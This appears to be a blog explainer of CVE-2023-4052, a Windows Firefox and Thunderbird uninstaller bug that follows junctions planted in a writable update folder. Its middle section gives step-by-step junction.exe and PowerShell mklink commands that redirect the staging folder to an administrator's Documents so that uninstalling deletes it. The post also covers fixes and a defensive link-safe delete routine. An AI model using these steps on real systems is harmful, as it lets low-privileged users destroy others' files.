CVE-2023-4052 - How a Faulty Firefox Updater Could Let Anyone Delete Your Files on Windows
Security is all about the details, and sometimes, a tiny overlooked thing can open a big hole. CVE-2023-4052 is one such case. This vulnerability affected Firefox, Firefox ESR, and Thunderbird on Windows. It wasn’t about breaking encryption or bypassing passwords, but rather, something deceptively simple: the permissions on a folder used by the Firefox updater.
In this long-read, I’ll break down how the bug worked, show some code, explain how it could be exploited, and provide useful links for those who want to dig deeper. Let’s walk through CVE-2023-4052.
At its core, the problem was this:
1. Firefox created a directory for updates, but made it so any user—even those without admin rights—could write to it.
2. When uninstalling Firefox, the installer recursively deleted all files and folders inside that directory, but with the full rights of the user uninstalling (likely an administrator).
3. If a low-privileged user set up a special type of Windows shortcut—called a junction—in that folder, pointing to some important system or user files...
4. Then, when the admin uninstalled Firefox, the installer would follow the junction and delete the files wherever it pointed, instead of just deleting its own files.
In simple terms: a normal user could trick the installer into destroying (almost) any file on the computer—just by creatively placing a link in the right spot and waiting for Firefox to be uninstalled.
Affected versions: Firefox before 116 and Thunderbird before 115.1 (Firefox ESR was affected as well; see the advisory linked below for the exact release).
Note: _Only Windows is affected._ Mac and Linux users are safe from this one.
With this bug, a low-privileged user could:
- Delete user files, causing denial of service or destroying evidence.
- Potentially exploit further—sometimes deleting files can be combined with other tricks to gain higher privileges.
Since uninstallers usually run as administrator, the impact is severe.
The problematic directory is typically:
C:\ProgramData\Mozilla\updates\
or the equivalent location under the user's local AppData.
When Firefox updates itself, it stores temporary files here. The permissions on this directory were set too loosely.
The Junction Attack
A junction is like a special shortcut in Windows. If an attacker can create a junction where the Firefox updater expects a regular folder, operations like “delete everything in here” will follow the junction and delete whatever it points to.
If the folder is set up like this:
C:\ProgramData\Mozilla\updates\staging <-- writable by any user
An attacker could delete staging and replace it with a junction pointing somewhere else, like the Documents folder.
When someone runs the uninstaller as admin, it does the equivalent of:
import shutil
# Recursive delete of the staging directory, running with the admin's rights.
# Illustrative Python only, not the uninstaller's actual code.
shutil.rmtree(r"C:\ProgramData\Mozilla\updates\staging")
But if staging is a junction to C:\Users\Admin\Documents, then everything inside Documents gets deleted—by an admin process!
3. Create a junction named staging that points to a target folder (e.g., the admin's Documents).
Example using the Windows command line (with Sysinternals junction.exe):
cd C:\ProgramData\Mozilla\updates
rmdir staging
junction staging "C:\Users\Admin\Documents"
4. Wait for the admin to uninstall Firefox.
5. During uninstallation, the Firefox uninstaller recursively deletes everything under updates\staging—which is now actually deleting Documents.
You can create the same junction in PowerShell like this:
$target = "C:\Users\Admin\Documents"
$link = "C:\ProgramData\Mozilla\updates\staging"
cmd /c "rmdir $link"
cmd /c "mklink /J $link $target"
Official References
- Mozilla Security Advisory 2023-29
- CVE Details: CVE-2023-4052
- Bugzilla Bug Report #1848712
1. Ensure the update directory isn’t writable by regular users.
2. Rework the uninstaller to check for junctions / symlinks and not follow them.
3. Harden permissions checks throughout the update/uninstall flow.
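As an added example of fix item 2 (my own code, not Mozilla's), here is a recursive delete that never follows links: every entry is inspected with lstat, symlinks and Windows reparse points (junctions) are removed as link objects rather than descended into, and a root that is itself a junction is refused. The demo() helper is a constructed replay of the staging-to-Documents scenario in a temp directory, using a symlink as the junction stand-in because a real junction needs Windows.

```python
import os
import stat
import tempfile
from pathlib import Path

def is_link_or_junction(path):
    """True for a symlink or a Windows reparse point such as a junction (lstat, no follow)."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return True
    # Junctions are not S_ISLNK; Windows reports them through the reparse-point attribute.
    return bool(getattr(st, "st_file_attributes", 0) & stat.FILE_ATTRIBUTE_REPARSE_POINT)

def safe_rmtree(root):
    """Delete root recursively without following links; returns (files_removed, links_removed)."""
    root = os.fspath(root)
    if is_link_or_junction(root):  # never operate on a root that is itself a junction
        raise OSError(f"refusing to delete through a link/junction: {root}")
    files = links = 0
    with os.scandir(root) as it:
        entries = list(it)
    for entry in entries:
        if is_link_or_junction(entry.path):
            # Remove the link object only; os.unlink also removes junctions on Windows.
            os.unlink(entry.path)
            links += 1
        elif entry.is_dir(follow_symlinks=False):
            sub_files, sub_links = safe_rmtree(entry.path)
            files, links = files + sub_files, links + sub_links
        else:
            os.unlink(entry.path)
            files += 1
    os.rmdir(root)
    return files, links

def demo():
    """Constructed scenario: staging/ holds a link to documents/ (symlink as junction stand-in)."""
    base = Path(tempfile.mkdtemp())
    docs = base / "documents"
    docs.mkdir()
    (docs / "secret.txt").write_text("must survive")
    staging = base / "staging"
    staging.mkdir()
    (staging / "update.tmp").write_text("junk")
    os.symlink(docs, staging / "link", target_is_directory=True)
    files, links = safe_rmtree(staging)
    return {"files": files, "links": links, "docs_intact": (docs / "secret.txt").exists(),
            "staging_gone": not staging.exists()}
```

Running demo() removes the staging directory and its one temp file, unlinks the link object, and leaves documents/secret.txt untouched.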
If you’re using Firefox version 116 or later (or Thunderbird 115.1+), you’re safe.
If unsure, delete everything under that directory manually before uninstalling.
The real fix? Always keep major software, especially browsers, up to date.
Conclusion
CVE-2023-4052 is a classic example of how even “harmless” update directories can harbor danger if permissions aren’t tightly controlled. It also reminds us of the importance of security reviews for any installer or updater on Windows, where privilege separation isn’t always enforced.
Hopefully, this post helped you understand how something as small as a folder permission could snowball into a serious bug. For more details, check out the official advisory and Mozilla’s bug tracker linked above.
Timeline
Published on: 08/01/2023 15:15:00 UTC
Last modified on: 08/07/2023 14:15:00 UTC